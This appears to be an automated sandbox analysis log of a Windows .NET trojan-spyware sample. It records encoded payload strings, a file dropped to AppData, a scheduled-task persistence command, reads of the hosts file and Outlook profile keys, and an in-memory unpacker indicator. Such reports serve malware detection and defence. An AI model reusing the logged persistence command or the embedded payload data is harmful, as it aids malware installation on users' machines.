                      Source: 3.2.SecuriteInfo.com.Win32.18332.exe.2d0000.0.unpack, LogIn.csBase64 encoded string: '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
                      Source: 4.2.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, LogIn.csBase64 encoded string: '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
                      Source: 4.0.SecuriteInfo.com.Win32.18332.exe.2e0000.0.unpack, LogIn.csBase64 encoded string: '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
                      Source: 5.2.SecuriteInfo.com.Win32.18332.exe.a40000.1.unpack, LogIn.csBase64 encoded string: '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
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/4@1/1
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile created: C:\Users\user\AppData\Roaming\mwflisJj.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeMutant created: \Sessions\1\BaseNamedObjects\AVGTVZUN
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_01
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1CC4.tmpJump to behavior
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
                      Source: SecuriteInfo.com.Win32.18332.exe, 00000000.00000002.256279873.0000000003231000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
                      Source: SecuriteInfo.com.Win32.18332.exeVirustotal: Detection: 26%
                      Source: SecuriteInfo.com.Win32.18332.exeReversingLabs: Detection: 35%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp'
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\mwflisJj' /XML 'C:\Users\user\AppData\Local\Temp\tmp1CC4.tmp'Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.18332.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.Win32.18332.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: SecuriteInfo.com.Win32.18332.exe, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: mwflisJj.exe.0.dr, BoundHandle.cs.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
